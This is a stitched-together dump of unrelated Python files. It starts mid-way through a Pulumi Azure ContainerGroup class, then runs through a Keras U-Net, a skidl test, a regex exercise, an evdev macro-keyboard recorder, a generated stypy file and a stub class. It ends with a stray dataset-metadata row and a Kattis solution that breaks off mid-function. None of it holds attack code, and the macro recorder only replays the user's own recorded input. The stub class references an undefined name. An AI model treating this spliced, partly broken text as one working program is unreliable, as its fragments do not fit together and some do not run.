image_registry_credentials: Optional[pulumi.Input[Sequence[pulumi.Input['ImageRegistryCredentialArgs']]]] = None,
ip_address: Optional[pulumi.Input['IpAddressArgs']] = None,
location: Optional[pulumi.Input[str]] = None,
restart_policy: Optional[pulumi.Input[Union[str, 'ContainerRestartPolicy']]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
volumes: Optional[pulumi.Input[Sequence[pulumi.Input['VolumeArgs']]]] = None):
"""
The set of arguments for constructing a ContainerGroup resource.
:param pulumi.Input[Sequence[pulumi.Input['ContainerArgs']]] containers: The containers within the container group.
:param pulumi.Input[Union[str, 'OperatingSystemTypes']] os_type: The operating system type required by the containers in the container group.
:param pulumi.Input[str] resource_group_name: The name of the resource group to contain the container group to be created or updated.
:param pulumi.Input[str] container_group_name: The name of the container group to be created or updated.
:param pulumi.Input[Sequence[pulumi.Input['ImageRegistryCredentialArgs']]] image_registry_credentials: The image registry credentials by which the container group is created from.
:param pulumi.Input['IpAddressArgs'] ip_address: The IP address type of the container group.
:param pulumi.Input[str] location: The resource location.
:param pulumi.Input[Union[str, 'ContainerRestartPolicy']] restart_policy: Restart policy for all containers within the container group. Currently the only available option is `always`.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: The resource tags.
:param pulumi.Input[Sequence[pulumi.Input['VolumeArgs']]] volumes: The list of volumes that can be mounted by containers in this container group.
"""
pulumi.set(__self__, "containers", containers)
pulumi.set(__self__, "os_type", os_type)
pulumi.set(__self__, "resource_group_name", resource_group_name)
if container_group_name is not None:
pulumi.set(__self__, "container_group_name", container_group_name)
if image_registry_credentials is not None:
pulumi.set(__self__, "image_registry_credentials", image_registry_credentials)
if ip_address is not None:
pulumi.set(__self__, "ip_address", ip_address)
if location is not None:
pulumi.set(__self__, "location", location)
if restart_policy is not None:
pulumi.set(__self__, "restart_policy", restart_policy)
if tags is not None:
pulumi.set(__self__, "tags", tags)
if volumes is not None:
pulumi.set(__self__, "volumes", volumes)
@property
@pulumi.getter
def containers(self) -> pulumi.Input[Sequence[pulumi.Input['ContainerArgs']]]:
"""
The containers within the container group.
"""
return pulumi.get(self, "containers")
@containers.setter
def containers(self, value: pulumi.Input[Sequence[pulumi.Input['ContainerArgs']]]):
pulumi.set(self, "containers", value)
@property
@pulumi.getter(name="osType")
def os_type(self) -> pulumi.Input[Union[str, 'OperatingSystemTypes']]:
"""
The operating system type required by the containers in the container group.
"""
return pulumi.get(self, "os_type")
@os_type.setter
def os_type(self, value: pulumi.Input[Union[str, 'OperatingSystemTypes']]):
pulumi.set(self, "os_type", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Input[str]:
"""
The name of the resource group to contain the container group to be created or updated.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter(name="containerGroupName")
def container_group_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the container group to be created or updated.
"""
return pulumi.get(self, "container_group_name")
@container_group_name.setter
def container_group_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "container_group_name", value)
@property
@pulumi.getter(name="imageRegistryCredentials")
def image_registry_credentials(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ImageRegistryCredentialArgs']]]]:
"""
The image registry credentials by which the container group is created from.
"""
return pulumi.get(self, "image_registry_credentials")
@image_registry_credentials.setter
def image_registry_credentials(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ImageRegistryCredentialArgs']]]]):
pulumi.set(self, "image_registry_credentials", value)
@property
@pulumi.getter(name="ipAddress")
def ip_address(self) -> Optional[pulumi.Input['IpAddressArgs']]:
"""
The IP address type of the container group.
"""
return pulumi.get(self, "ip_address")
@ip_address.setter
def ip_address(self, value: Optional[pulumi.Input['IpAddressArgs']]):
pulumi.set(self, "ip_address", value)
@property
@pulumi.getter
def location(self) -> Optional[pulumi.Input[str]]:
"""
The resource location.
"""
return pulumi.get(self, "location")
@location.setter
def location(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "location", value)
@property
@pulumi.getter(name="restartPolicy")
def restart_policy(self) -> Optional[pulumi.Input[Union[str, 'ContainerRestartPolicy']]]:
"""
Restart policy for all containers within the container group. Currently the only available option is `always`.
"""
return pulumi.get(self, "restart_policy")
@restart_policy.setter
def restart_policy(self, value: Optional[pulumi.Input[Union[str, 'ContainerRestartPolicy']]]):
pulumi.set(self, "restart_policy", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
The resource tags.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@property
@pulumi.getter
def volumes(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['VolumeArgs']]]]:
"""
The list of volumes that can be mounted by containers in this container group.
"""
return pulumi.get(self, "volumes")
@volumes.setter
def volumes(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['VolumeArgs']]]]):
pulumi.set(self, "volumes", value)
class ContainerGroup(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
container_group_name: Optional[pulumi.Input[str]] = None,
containers: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ContainerArgs']]]]] = None,
image_registry_credentials: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ImageRegistryCredentialArgs']]]]] = None,
ip_address: Optional[pulumi.Input[pulumi.InputType['IpAddressArgs']]] = None,
location: Optional[pulumi.Input[str]] = None,
os_type: Optional[pulumi.Input[Union[str, 'OperatingSystemTypes']]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
restart_policy: Optional[pulumi.Input[Union[str, 'ContainerRestartPolicy']]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
volumes: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['VolumeArgs']]]]] = None,
__props__=None):
"""
A container group.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] container_group_name: The name of the container group to be created or updated.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ContainerArgs']]]] containers: The containers within the container group.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ImageRegistryCredentialArgs']]]] image_registry_credentials: The image registry credentials by which the container group is created from.
:param pulumi.Input[pulumi.InputType['IpAddressArgs']] ip_address: The IP address type of the container group.
:param pulumi.Input[str] location: The resource location.
:param pulumi.Input[Union[str, 'OperatingSystemTypes']] os_type: The operating system type required by the containers in the container group.
:param pulumi.Input[str] resource_group_name: The name of the resource group to contain the container group to be created or updated.
:param pulumi.Input[Union[str, 'ContainerRestartPolicy']] restart_policy: Restart policy for all containers within the container group. Currently the only available option is `always`.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: The resource tags.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['VolumeArgs']]]] volumes: The list of volumes that can be mounted by containers in this container group.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: ContainerGroupArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
A container group.
:param str resource_name: The name of the resource.
:param ContainerGroupArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(ContainerGroupArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
container_group_name: Optional[pulumi.Input[str]] = None,
containers: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ContainerArgs']]]]] = None,
image_registry_credentials: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ImageRegistryCredentialArgs']]]]] = None,
ip_address: Optional[pulumi.Input[pulumi.InputType['IpAddressArgs']]] = None,
location: Optional[pulumi.Input[str]] = None,
os_type: Optional[pulumi.Input[Union[str, 'OperatingSystemTypes']]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
restart_policy: Optional[pulumi.Input[Union[str, 'ContainerRestartPolicy']]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
volumes: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['VolumeArgs']]]]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = ContainerGroupArgs.__new__(ContainerGroupArgs)
__props__.__dict__["container_group_name"] = container_group_name
if containers is None and not opts.urn:
raise TypeError("Missing required property 'containers'")
__props__.__dict__["containers"] = containers
__props__.__dict__["image_registry_credentials"] = image_registry_credentials
__props__.__dict__["ip_address"] = ip_address
__props__.__dict__["location"] = location
if os_type is None and not opts.urn:
raise TypeError("Missing required property 'os_type'")
__props__.__dict__["os_type"] = os_type
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__.__dict__["resource_group_name"] = resource_group_name
__props__.__dict__["restart_policy"] = restart_policy
__props__.__dict__["tags"] = tags
__props__.__dict__["volumes"] = volumes
__props__.__dict__["name"] = None
__props__.__dict__["provisioning_state"] = None
__props__.__dict__["state"] = None
__props__.__dict__["type"] = None
alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="azure-nextgen:containerinstance/v20170801preview:ContainerGroup"), pulumi.Alias(type_="azure-native:containerinstance:ContainerGroup"), pulumi.Alias(type_="azure-nextgen:containerinstance:ContainerGroup"), pulumi.Alias(type_="azure-native:containerinstance/v20171001preview:ContainerGroup"), pulumi.Alias(type_="azure-nextgen:containerinstance/v20171001preview:ContainerGroup"), pulumi.Alias(type_="azure-native:containerinstance/v20171201preview:ContainerGroup"), pulumi.Alias(type_="azure-nextgen:containerinstance/v20171201preview:ContainerGroup"), pulumi.Alias(type_="azure-native:containerinstance/v20180201preview:ContainerGroup"), pulumi.Alias(type_="azure-nextgen:containerinstance/v20180201preview:ContainerGroup"), pulumi.Alias(type_="azure-native:containerinstance/v20180401:ContainerGroup"), pulumi.Alias(type_="azure-nextgen:containerinstance/v20180401:ContainerGroup"), pulumi.Alias(type_="azure-native:containerinstance/v20180601:ContainerGroup"), pulumi.Alias(type_="azure-nextgen:containerinstance/v20180601:ContainerGroup"), pulumi.Alias(type_="azure-native:containerinstance/v20180901:ContainerGroup"), pulumi.Alias(type_="azure-nextgen:containerinstance/v20180901:ContainerGroup"), pulumi.Alias(type_="azure-native:containerinstance/v20181001:ContainerGroup"), pulumi.Alias(type_="azure-nextgen:containerinstance/v20181001:ContainerGroup"), pulumi.Alias(type_="azure-native:containerinstance/v20191201:ContainerGroup"), pulumi.Alias(type_="azure-nextgen:containerinstance/v20191201:ContainerGroup"), pulumi.Alias(type_="azure-native:containerinstance/v20201101:ContainerGroup"), pulumi.Alias(type_="azure-nextgen:containerinstance/v20201101:ContainerGroup"), pulumi.Alias(type_="azure-native:containerinstance/v20210301:ContainerGroup"), pulumi.Alias(type_="azure-nextgen:containerinstance/v20210301:ContainerGroup"), pulumi.Alias(type_="azure-native:containerinstance/v20210701:ContainerGroup"), pulumi.Alias(type_="azure-nextgen:containerinstance/v20210701:ContainerGroup"), pulumi.Alias(type_="azure-native:containerinstance/v20210901:ContainerGroup"), pulumi.Alias(type_="azure-nextgen:containerinstance/v20210901:ContainerGroup")])
opts = pulumi.ResourceOptions.merge(opts, alias_opts)
super(ContainerGroup, __self__).__init__(
'azure-native:containerinstance/v20170801preview:ContainerGroup',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None) -> 'ContainerGroup':
"""
Get an existing ContainerGroup resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = ContainerGroupArgs.__new__(ContainerGroupArgs)
__props__.__dict__["containers"] = None
__props__.__dict__["image_registry_credentials"] = None
__props__.__dict__["ip_address"] = None
__props__.__dict__["location"] = None
__props__.__dict__["name"] = None
__props__.__dict__["os_type"] = None
__props__.__dict__["provisioning_state"] = None
__props__.__dict__["restart_policy"] = None
__props__.__dict__["state"] = None
__props__.__dict__["tags"] = None
__props__.__dict__["type"] = None
__props__.__dict__["volumes"] = None
return ContainerGroup(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def containers(self) -> pulumi.Output[Sequence['outputs.ContainerResponse']]:
"""
The containers within the container group.
"""
return pulumi.get(self, "containers")
@property
@pulumi.getter(name="imageRegistryCredentials")
def image_registry_credentials(self) -> pulumi.Output[Optional[Sequence['outputs.ImageRegistryCredentialResponse']]]:
"""
The image registry credentials by which the container group is created from.
"""
return pulumi.get(self, "image_registry_credentials")
@property
@pulumi.getter(name="ipAddress")
def ip_address(self) -> pulumi.Output[Optional['outputs.IpAddressResponse']]:
"""
The IP address type of the container group.
"""
return pulumi.get(self, "ip_address")
@property
@pulumi.getter
def location(self) -> pulumi.Output[str]:
"""
The resource location.
"""
return pulumi.get(self, "location")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
The resource name.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="osType")
def os_type(self) -> pulumi.Output[str]:
"""
The operating system type required by the containers in the container group.
"""
return pulumi.get(self, "os_type")
@property
@pulumi.getter(name="provisioningState")
def provisioning_state(self) -> pulumi.Output[str]:
"""
The provisioning state of the container group. This only appears in the response.
"""
return pulumi.get(self, "provisioning_state")
@property
@pulumi.getter(name="restartPolicy")
def restart_policy(self) -> pulumi.Output[Optional[str]]:
"""
Restart policy for all containers within the container group. Currently the only available option is `always`.
"""
return pulumi.get(self, "restart_policy")
@property
@pulumi.getter
def state(self) -> pulumi.Output[str]:
"""
The current state of the container group. This is only valid for the response.
"""
return pulumi.get(self, "state")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
"""
The resource tags.
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter
def type(self) -> pulumi.Output[str]:
"""
The resource type.
"""
return pulumi.get(self, "type")
@property
@pulumi.getter
def volumes(self) -> pulumi.Output[Optional[Sequence['outputs.VolumeResponse']]]:
"""
The list of volumes that can be mounted by containers in this container group.
"""
return pulumi.get(self, "volumes")
# ---- BB8-2020/FARM-deforestation -- python/models/sampling_model.py (no license) ----
"""File to host a modified U-Net implementation with emphasis on an additional up/downsampling layer."""
from keras import Input, Model
from keras import layers as keras_layers
def get_sampling_model(img_size: tuple = (512, 512), num_classes: int = 2) -> Model:
"""Create and return a UNET model.
Parameters
----------
img_size
The image size in pixel dimensions.
num_classes
The amount of classes to classify.
Returns
-------
model
The created UNET model.
"""
inputs = Input(shape=img_size + (3,))
#: [First half of the network: downsampling inputs].
x = keras_layers.Conv2D(32, 3, strides=2, padding="same")(inputs)
x = keras_layers.BatchNormalization()(x)
x = keras_layers.Activation("relu")(x)
#: Set aside residual.
previous_block_activation = x
    #: Blocks 1-4 are identical apart from the feature depth.
for filters in [64, 128, 256, 512]:
x = keras_layers.Activation("relu")(x)
x = keras_layers.SeparableConv2D(filters, 3, padding="same")(x)
x = keras_layers.BatchNormalization()(x)
x = keras_layers.Activation("relu")(x)
x = keras_layers.SeparableConv2D(filters, 3, padding="same")(x)
x = keras_layers.BatchNormalization()(x)
x = keras_layers.MaxPooling2D(3, strides=2, padding="same")(x)
#: Project residual.
residual = keras_layers.Conv2D(filters, 1, strides=2, padding="same")(
previous_block_activation
)
#: Add back residual.
x = keras_layers.add([x, residual])
#: Set aside next residual.
previous_block_activation = x
#: [Second half of the network: upsampling inputs].
for filters in [512, 256, 128, 64, 32]:
x = keras_layers.Activation("relu")(x)
x = keras_layers.Conv2DTranspose(filters, 3, padding="same")(x)
x = keras_layers.BatchNormalization()(x)
x = keras_layers.Activation("relu")(x)
x = keras_layers.Conv2DTranspose(filters, 3, padding="same")(x)
x = keras_layers.BatchNormalization()(x)
x = keras_layers.UpSampling2D(2)(x)
#: Project residual.
residual = keras_layers.UpSampling2D(2)(previous_block_activation)
residual = keras_layers.Conv2D(filters, 1, padding="same")(residual)
#: Add back residual.
x = keras_layers.add([x, residual])
#: Set aside next residual.
previous_block_activation = x
#: Add a per-pixel classification layer.
outputs = keras_layers.Conv2D(num_classes, 3, activation="softmax", padding="same")(
x
)
#: Define the model.
model = Model(inputs, outputs)
return model
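# Minimal smoke test (editor's sketch; assumes Keras/TensorFlow is installed).
if __name__ == "__main__":
    unet = get_sampling_model()  # default 512x512 RGB input, 2 classes
    unet.summary()               # bottleneck is 16x16; output is 512x512 softmax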
# ---- Ariyatina/skidl -- tests/test_interface.py (MIT) ----
import pytest
from skidl import *
from .setup_teardown import *
def test_interface_1():
"""Test interface."""
@subcircuit
def resdiv(gnd, vin, vout):
res = Part("Device", "R", dest=TEMPLATE)
r1 = res(value="1k")
r2 = res(value="500")
cap = Part("Device", "C", dest=TEMPLATE)
c1 = cap()
c2 = cap(value="1uF")
bus1 = Bus("BB", 10)
vin += r1[1], c1[1] # Connect the input to the first resistor.
gnd += r2[2], c2[2] # Connect the second resistor to ground.
vout += (
r1[2],
c1[2],
r2[1],
c2[1],
) # Output comes from the connection of the two resistors.
intfc = Interface(gnd=Net("GND"), vin=Net("VI"), vout=Net("VO"),)
intfc.gnd.aliases += "GND"
intfc.gnd.aliases += "GNDA"
resdiv(**intfc)
resdiv(**intfc)
assert len(default_circuit.parts) == 8
assert len(default_circuit.get_nets()) == 3
assert len(default_circuit.buses) == 2
assert len(Net.fetch("GND")) == 4
assert len(Net.fetch("VI")) == 4
assert len(Net.fetch("VO")) == 8
assert len(intfc.gnd) == 4
assert len(intfc.vin) == 4
assert len(intfc.vout) == 8
assert len(intfc["gnd"]) == 4
assert len(intfc["vin"]) == 4
assert len(intfc["vout"]) == 8
intfc.gnd += Pin()
intfc["vin"] += Pin()
assert len(Net.fetch("GND")) == 5
assert len(Net.fetch("VI")) == 5
assert len(Net.fetch("VO")) == 8
assert len(intfc.gnd) == 5
assert len(intfc.vin) == 5
assert len(intfc.vout) == 8
assert len(intfc["gnd"]) == 5
assert len(intfc["vin"]) == 5
assert len(intfc["vout"]) == 8
assert len(intfc["GND"]) == 5
assert len(intfc["GNDA"]) == 5
# ---- Alice-Avetisyan/project -- homework4/Ex12.py (no license) ----
import re
string = 'A reaaaalllyyy long string'
search = re.search('rea', string)
print(search)

# ---- GLMF/GLMF200 -- Hack_et_Bidouille/step_9/MacroKeyboard.py (no license) ----
import evdev
from evdev import ecodes, UInput
import key
from configparser import ConfigParser
import ast
from gui.KeyboardLeds import KeyboardLeds
from gui.Notify import Notify
import logging
import logging.config
import pyautogui
class MacroKeyboard:
MOUSE_BTN = {key.BUTTON_LEFT : 'left', key.BUTTON_RIGHT : 'right' }
def __init__(self, dev, dev_mouse, activeLog=False, configFile='keyboardrc.ini', logFile='keyboardlogrc.ini'):
self.__device = evdev.InputDevice(dev)
self.__device_mouse = evdev.InputDevice(dev_mouse)
self.leds = KeyboardLeds(self.__device)
self.leds.reset()
self.notify = Notify('Keyboard Macros')
self.notify.send('Running and connected to <b>{}</b>'.format(dev))
self.__activeLog = activeLog
if self.__activeLog:
logging.config.fileConfig(logFile)
self.__logger = logging.getLogger('root')
self.__recording_buffer = []
self.__recording = False
self.__attribute_key = False
self.__protect = False
self.__unprotect = False
self.__recording_mouse_buffer = []
self.__recording_mouse = False
self.__configFile = configFile
self.__macros = {} # defined in readConfig()
self.readConfig()
self.__ui = UInput()
########
### Logging management
def log(self, message, cat='info'):
if self.__activeLog:
if cat == 'info':
self.__logger.info(message)
            elif cat == 'debug':
                self.__logger.debug(message)
            elif cat == 'error':
                self.__logger.error(message)  # was logger.debug, and a duplicated 'debug' branch is removed
########
### Recording management
def startRecording(self):
self.log('Start recording macro')
self.notify.send('Start recording macro')
self.leds.numLockOn()
self.__recording = True
def stopRecording(self):
self.log('Buffer: {}'.format(self.__recording_buffer))
self.leds.numLockOff()
self.leds.capsLockOn()
self.notify.send('Stop recording macro\nHit a key to save the buffer')
self.__recording = False
def saveMacro(self, key):
if key in self.__macros and 'lock' in self.__macros[key]:
self.notify.send('Macro on <b>{}</b> is protected'.format(key))
else:
self.__macros[key] = {'key_down': self.__recording_buffer}
self.log('Macros: {}'.format(self.__macros), cat='debug')
self.writeConfig()
def protectKey(self, key):
self.__macros[key]['lock'] = True
self.log('Macros: {}'.format(self.__macros), cat='debug')
self.writeConfig()
def unprotectKey(self, key):
if 'lock' in self.__macros[key]:
del self.__macros[key]['lock']
self.log('Macros: {}'.format(self.__macros), cat='debug')
self.writeConfig()
########
### Mouse recording management
def startMouseRecording(self):
self.log('Start mouse recording macro')
self.notify.send('Start mouse recording macro')
self.leds.numLockOn()
self.__recording_mouse = True
self.mouseRecording()
def mouseRecording(self):
for event in self.__device_mouse.read_loop():
if event.type == ecodes.EV_KEY:
# Click detection
if (event.code == ecodes.BTN_MOUSE or event.code == ecodes.BTN_RIGHT) and event.value == 1:
(mouse_x, mouse_y) = pyautogui.position()
                    self.notify.send('Mouse click on button {} ({}, {})'.format(MacroKeyboard.MOUSE_BTN[event.code], mouse_x, mouse_y))
self.__recording_mouse_buffer.append((event.code, (mouse_x, mouse_y)))
self.log(self.__recording_mouse_buffer)
elif event.code == ecodes.BTN_MIDDLE and event.value == 1:
self.log('Stop mouse recording macro')
self.notify.send('Stop mouse recording macro\nHit a key to save the buffer')
self.leds.numLockOff()
self.leds.capsLockOn()
return
def saveMouseMacro(self, key):
if key in self.__macros and 'lock' in self.__macros[key]:
self.notify.send('Macro on <b>{}</b> is protected'.format(key))
else:
self.__macros[key] = {'mouse': self.__recording_mouse_buffer}
self.log('Macros: {}'.format(self.__macros), cat='debug')
self.writeConfig()
########
### Configuration file management
def readConfig(self):
self.__macros = {}
config = ConfigParser()
config.read(self.__configFile)
for keysym in config.sections():
self.log(config[keysym], cat='debug')
actions_list = {}
for action in config[keysym]:
actions_list[action] = ast.literal_eval(config[keysym][action])
self.__macros[keysym] = actions_list
                self.log('Macro for {} => {}'.format(keysym, self.__macros[keysym]), cat='debug')
self.log('Macros: {}'.format(self.__macros), cat='debug')
def writeConfig(self):
config = ConfigParser()
for keysym, action in self.__macros.items():
config[keysym] = action
try:
with open(self.__configFile, 'w') as fic:
config.write(fic)
except:
self.log('Write error on config file'.format(self.__configFile), cat='error')
self.notify.send('Write error on config file <b>{}</b>'.format(self.__configFile))
exit(2)
########
### Keys management
def pressKey(self, keysym):
self.__ui.write(ecodes.EV_KEY, ecodes.ecodes[keysym], 1)
self.__ui.write(ecodes.EV_KEY, ecodes.ecodes[keysym], 0)
self.__ui.syn()
def pressKeys(self, keysymList):
for keysym in keysymList:
self.pressKey(keysym)
########
### Mouse management
def activeMouseMvt(self, mousemvt):
btn, (mouse_x, mouse_y) = mousemvt
pyautogui.moveTo(mouse_x, mouse_y)
pyautogui.click(button=MacroKeyboard.MOUSE_BTN[btn])
def activeMouseMvts(self, mousemvtsList):
for mousemvt in mousemvtsList:
self.activeMouseMvt(mousemvt)
########
### Keyboard main management
def read(self):
for event in self.__device.read_loop():
if event.type == ecodes.EV_KEY:
# Recording management with key.RECORDING
if event.code == key.RECORDING and not self.__attribute_key and event.value == 1:
if not self.__recording:
self.startRecording()
else:
self.stopRecording()
self.__attribute_key = True
# Recording keys
if self.__recording and event.code != key.RECORDING and event.value == 1:
self.notify.flash('Hit on <b>{}</b>'.format(ecodes.KEY[event.code]))
self.__recording_buffer.append(ecodes.KEY[event.code])
# Set attribute to a macro
elif self.__attribute_key and event.code != key.RECORDING and event.value == 1:
self.__attribute_key = False
self.saveMacro(ecodes.KEY[event.code])
self.notify.send('Macro saved in <b>{}</b>'.format(ecodes.KEY[event.code]))
self.leds.capsLockOff()
self.__recording_buffer = []
self.log('Macros: {}'.format(self.__macros), cat='debug')
# Protect a macro
elif event.code == ecodes.KEY_TAB and event.value == 1:
self.notify.send('Hit a key to indicate macro to protect')
self.leds.capsLockOn()
self.__protect = True
elif self.__protect and event.value == 1:
if ecodes.KEY[event.code] in self.__macros:
self.protectKey(ecodes.KEY[event.code])
self.notify.send('Macro <b>{}</b> is protected'.format(ecodes.KEY[event.code]))
else:
self.notify.send('Macro not found')
self.leds.capsLockOff()
self.__protect = False
# Unprotect a macro
elif event.code == ecodes.KEY_CAPSLOCK and event.value == 1:
self.notify.send('Hit a key to indicate macro to unprotect')
self.leds.capsLockOn()
self.__unprotect = True
elif self.__unprotect and event.value == 1:
if ecodes.KEY[event.code] in self.__macros:
self.unprotectKey(ecodes.KEY[event.code])
self.notify.send('Macro <b>{}</b> is no more protected'.format(ecodes.KEY[event.code]))
else:
self.notify.send('Macro not found')
self.leds.capsLockOff()
self.__unprotect = False
# Mouse recording
elif event.code == key.RECORDING_MOUSE and event.value == 1:
self.startMouseRecording()
elif self.__recording_mouse and event.code != key.RECORDING and event.code != key.RECORDING_MOUSE and event.value == 1:
self.saveMouseMacro(ecodes.KEY[event.code])
self.notify.send('Macro saved in <b>{}</b>'.format(ecodes.KEY[event.code]))
self.leds.capsLockOff()
self.__recording_mouse_buffer = []
self.log('Macros: {}'.format(self.__macros), cat='debug')
self.__recording_mouse = False
# Execute macros
else:
for keysym, action in self.__macros.items():
if event.code == ecodes.ecodes[keysym] and event.value == 1:
if 'key_down' in action:
self.pressKeys(action['key_down'])
elif 'mouse' in action:
self.activeMouseMvts(action['mouse'])
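# Illustrative launcher (editor's sketch): the two event-device paths are
# machine-specific assumptions; list yours with `python -m evdev.evtest`.
#
#   if __name__ == '__main__':
#       kb = MacroKeyboard('/dev/input/event3', '/dev/input/event4', activeLog=True)
#       kb.read()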
# ---- ComputationalReflection/stypy -- stypy/sgmc/sgmc_cache/taxonomy/builtin_functions/slice/error_slice_parameters.py (no license) ----
# -*- coding: utf-8 -*-
"""
ORIGINAL PROGRAM SOURCE CODE:
1: # coding=utf-8
2: __doc__ = "slice method is present, but is invoked with a wrong number of parameters"
3:
4: if __name__ == '__main__':
5: # Call options
6: # (AnyType) -> <type 'slice'>
7: # (AnyType, AnyType) -> <type 'slice'>
8: # (AnyType, AnyType, AnyType) -> <type 'slice'>
9:
10:
11: # Call the builtin with incorrect number of parameters
12: # Type error
13: ret = slice(3, 4, 5, 6)
14:
"""
# Import the stypy library necessary elements
from stypy.type_inference_programs.type_inference_programs_imports import *
# Create the module type store
module_type_store = Context(None, __file__)
# ################# Begin of the type inference program ##################
# Assigning a Str to a Name (line 2):
str_1 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 2, 10), 'str', 'slice method is present, but is invoked with a wrong number of parameters')
# Assigning a type to the variable '__doc__' (line 2)
module_type_store.set_type_of(stypy.reporting.localization.Localization(__file__, 2, 0), '__doc__', str_1)
if (__name__ == '__main__'):
# Assigning a Call to a Name (line 13):
# Call to slice(...): (line 13)
# Processing the call arguments (line 13)
int_3 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 13, 16), 'int')
int_4 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 13, 19), 'int')
int_5 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 13, 22), 'int')
int_6 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 13, 25), 'int')
# Processing the call keyword arguments (line 13)
kwargs_7 = {}
# Getting the type of 'slice' (line 13)
slice_2 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 13, 10), 'slice', False)
# Calling slice(args, kwargs) (line 13)
slice_call_result_8 = invoke(stypy.reporting.localization.Localization(__file__, 13, 10), slice_2, *[int_3, int_4, int_5, int_6], **kwargs_7)
# Assigning a type to the variable 'ret' (line 13)
module_type_store.set_type_of(stypy.reporting.localization.Localization(__file__, 13, 4), 'ret', slice_call_result_8)
# ################# End of the type inference program ##################
module_errors = stypy.errors.type_error.StypyTypeError.get_error_msgs()
module_warnings = stypy.errors.type_warning.TypeWarning.get_warning_msgs()
# ---- cash2one/xai -- xai/brain/wordbase/otherforms/_thudded.py (MIT) ----
#calss header
class _THUDDED():
def __init__(self,):
self.name = "THUDDED"
self.definitions = thud
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.basic = ['thud']
| [
"[email protected]"
] | |
5d6b71efebb6a271a66b3250e0e7046636ba5f4d | 32f5bc330388a96877d93fdd7b21599a40735400 | /Python/bitbybit.py | 4d3828f05ee797f54e45115008e3d6f1e9edac58 | [] | no_license | alexlwn123/kattis | 670180d86f0863328a16e12ed937c2fefb3226a2 | c1163bae3fdaf95c1087b216c48e7e19059d3d38 | refs/heads/master | 2021-06-21T16:26:15.642449 | 2020-12-24T20:59:10 | 2020-12-24T20:59:10 | 152,286,208 | 1 | 1 | null | 2018-10-14T22:40:09 | 2018-10-09T16:40:48 | Java | UTF-8 | Python | false | false | 891 | py | def main():
n = int(input())
while n:
bits = [-1 for i in range(32)]
for i in range(n):
line = input().split()
if line[0] == 'SET':
bits[int(line[1])] = 1
elif line[0] == 'CLEAR':
